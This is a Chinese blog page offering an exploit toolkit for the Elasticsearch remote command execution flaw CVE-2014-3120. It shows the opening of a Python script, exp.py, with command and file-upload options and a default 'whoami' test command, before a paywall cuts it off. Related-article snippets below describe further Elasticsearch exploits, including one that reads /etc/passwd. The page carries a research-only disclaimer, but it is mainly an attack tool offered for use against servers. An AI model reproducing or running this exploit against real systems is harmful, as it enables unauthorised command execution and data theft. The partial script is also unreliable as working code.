elasticsearch 漏洞利用工具套装

ElasticSearch漏洞利用与研究工具
最新推荐文章于 2025-10-14 11:53:55 发布
原创 最新推荐文章于 2025-10-14 11:53:55 发布 · 3.1k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了ElasticSearch,一个基于Lucene的开源、分布式搜索引擎,强调其在云计算中的实时搜索、高稳定性及易用性。文章还提及了一个支持HTTP JSON数据索引的漏洞利用工具套装,包括exp.py和check.py,但警告读者仅限于合法的漏洞研究,避免非法使用,并提醒可能的法律责任。

ElasticSearch是一个基于Lucene构建的开源,分布式,RESTful搜索引擎。设计用于云计算中,能够达到实时搜索,稳定,可靠,快速,安装使用方便。支持通过HTTP使用JSON进行数据索引。

请勿用于非法用途,只供漏洞研究之用

因该脚本造成法律问题,作者概不负责,如果违反相关规定,请通知管理员删除该文章

exp:post提交 支持文件上传功能

exp.py

#!/usr/bin/env python
# by heshang ha.cker@me.com
# -*- coding: utf-8 -*-

import httplib
import urllib,urllib2
import simplejson
import string
import sys
from optparse import OptionParser

print 'Elasticsearch ExpLoit By Heshang'
print '                         2014-06-23'
options = OptionParser(usage='%prog ip [port] [command]', description='elasticsearch command exec exploit(CVE-2014-3120)')
options.add_option('-p', '--port', type='int', default='9200',help='The elasticsearch port (default:9200)')
options.add_option('-c', '--cmd', type='str', default='whoami', help='command to test (default:whoami)')
options.add_option('-P', '--path',type='str', default='', help='Upload file\'s path')

def post(ip,port,exp):
    ip=ip
    port=port
    path=''
    exp=exp
    data = {
     
     
    "size": 1,
    "query": {
     
     
        "filtered": {
     
     
            "query": {
     
     
                "match_all": {}
最低0.47元/天 解锁文章
[更新]Elasticsearch 代码执行漏洞利用检测工具
胡杨林
05-26 5737
1. ElasticSearch是一个基于Lucene构建的开源,分布式,RESTful搜索引擎。设计用于云计算中,能够达到实时搜索,稳定,可靠,快速,安装使用方便。 2、Lucene是apache软件基金会4 jakarta项目组的一个子项目,是一个开放源代码的全文检索引擎工具
使用Elastic Security检测最新的spring4shell漏洞
点火三周的专栏
04-08 1692
这个漏洞在清明假期刚出来的时候就想研究一下,一直拖延到现在。看来是已经赶不上热度了,但我觉得还是值得记录一下的。特别是Elastic刚刚在Forrester的“终端检测与响应Wave”报告中, 被评为“Strong Performer”(卓越表现者) 而对于这种层出不穷的零日漏洞,即便是购买了昂贵的网络安全设备都防不住,只能做事后诸葛。那不如考虑看看免费的开源解决方案,并且检测与响应已经成为了一种安全防御的共识:边界防御是一定会被渗透的,快速的检测与响应是必须的。 Spring4Shell 漏洞的工作原理
elasticsearch漏洞检测工具V1.0.zip
05-26
elasticsearch漏洞检测工具V1.0.zip
Elasticsearch_1.2漏洞利用工具
05-15
Elasticsearch_1.2漏洞利用工具,可以执行命令,上传文件,浏览文件。
ElasticSearch沙盒绕过漏洞复现:原理详解+环境搭建+渗透实践(CVE-2015-1427)
最新发布
mooyuan的网络安全博客
10-14 932
摘要:本文详细分析了ElasticSearch沙盒绕过漏洞(CVE-2015-1427)的原理与利用方法。该漏洞存在于Elasticsearch 1.4.x及之前版本,攻击者可通过Groovy脚本利用Java反射机制绕过沙盒限制,执行任意系统命令。文章提供了完整的漏洞复现环境搭建指南(基于Docker和Vulhub),并展示了多种攻击Payload构造方法,包括执行id和cat /etc/passwd命令的实战案例。该漏洞危害严重,建议升级至1.5.x以上版本或采取网络隔离措施。
elasticsearch漏洞监测工具
09-17
elastiecsearch 的漏洞检测工具,对于elastiecsearch 在配置上或者版本上存在的问题有很好的检测和利用价值。
Elasticsearch 代码执行漏洞利用工具
weixin_34408624的博客
11-03 1036
命令参数忘记编码了,导致不能执行多参数已修复了。修改了超时为10秒、异常情况直接输出页面源码。1、ElasticSearch是一个基于Lucene构建的开源,分布式,RESTful搜索引擎。设计用于云计算中,能够达到实时搜索,稳定,可靠,快速,安装使用方便。2、Lucene是apache软件基金会4 jakarta项目组的一个子项目,是一个开放源代码的全文检索引擎工具包这个漏...
elasticsearch未授权漏洞判断与利用
pzl01的博客
09-01 1360
Elasticsearch 是一个分布式、高扩展、高实时的搜索与数据分析引擎。它能很方便的使大量数据具有搜索、分析和探索的能力。返回字段中有“you know,for search”则代表有未授权漏洞。1.利用工具ElasticSearch Head。二、elasticsearch未授权漏洞判断。三、elasticsearch未授权漏洞利用。Chrome插件的方式,利用成功,查看数据。下面展示的是某一个小日子过得不错的网站。一、elasticsearch介绍。2.不存在未授权样式:有登录点。
Elasticsearch漏洞检测.rar
11-22
Elasticsearch漏洞检测工具,包含Elasticsearch_1.2漏洞利用工具.jar和esExploit (elasticsearch)终极版.jar(Powered By VTI),如有侵权请联系删除。
elasitcsearch漏洞在线检测工具
huaxiang_hu的专栏
05-21 1727
ZoomEye发布 ElasticSearch 远程代码执行漏洞(CVE-2014-3120) 全球分布:http://www.zoomeye.org/lab/es ElasticSearch 是一个广泛使用的数据库,在默认配置情况下,攻击者可以发送一个恶意请求让服务器执行 Java 代码,从而获取数据库敏感信息甚至发起更深入的攻击。在线漏洞检测:http://tool.scanv.com/es.
2016最新struts2漏洞利用工具无后门版(K8 Struts2 Exploit)
03-05
K8 Struts2 Exploit神器唯一无后门的版本,可自行杀毒检验
ElasticSearch几个漏洞总结
热门推荐
u011066706的专栏
04-17 2万+
ElasticSearch远程命令执行(CVE-2014-3120) 漏洞介绍: ElasticSearch有脚本执行(scripting)的功能,可以很方便地对查询出来的数据再加工处理。ElasticSearch用的脚本引擎是MVEL,这个引擎没有做任何的防护,或者沙盒包装,所以直接可以执行任意代码。 而在ElasticSearch 1.2之前的版本中,默认配置是打开动态脚本功能的,如
ElasticSearch 命令执行漏洞(CVE-2014-3120)
黑白的博客
12-13 720
声明 好好学习,天天向上 漏洞描述 ElasticSearch 1.2版本之前支持动态脚本。漏洞是通过_search方法的参数传入恶意代码,远程执行任意MVEL表达式和Java代码。 影响范围 ElasticSearch 1.2之前的版本 复现过程 这里使用1.1.1版本 使用vulhub cd /app/vulhub-master/elasticsearch/CVE-2014-3120 使用docker启动 docker-compose up -d 环境启动后,访问http://your-ip:920
漏洞预警:Elasticsearch的Kibana存在任意代码执行漏洞(CVE-2025-25012)
yuanlirong22的专栏
03-07 1381
Elasticsearch的Kibana存在任意代码执行漏洞(CVE-2025-25012)。允许攻击者操纵应用程序的JavaScript对象和属性,可能导致未经授权的数据访问、权限提升、拒绝服务或远程代码执行。在Kibana 8.15.0和8.17.1之间的版本中,该漏洞仅可由具有查看者角色的用户利用。在Kibana版本8.17.1和8.17.2中,它只能被具有fleet-all或integrations-all或actions:execute-advanced-connectors权限的用户利用
Elasticsearch未授权访问漏洞
weixin_30376083的博客
12-14 738
一. 漏洞简介 漏洞描述:ElasticSearch是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口。Elasticsearch是用Java开发的,并作为Apache许可条款下的开放源码发布,是当前流行的企业级搜索引擎。Elasticsearch的增删改查操作全部由http接口完。由于Elasticsearch授权模块需要付费,所以免...
elasticsearch未授权访问 验证
qll71的博客
08-12 1672
内网渗透测试利用Fscan扫出来elasticsearch未授权访问对其进行验证。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值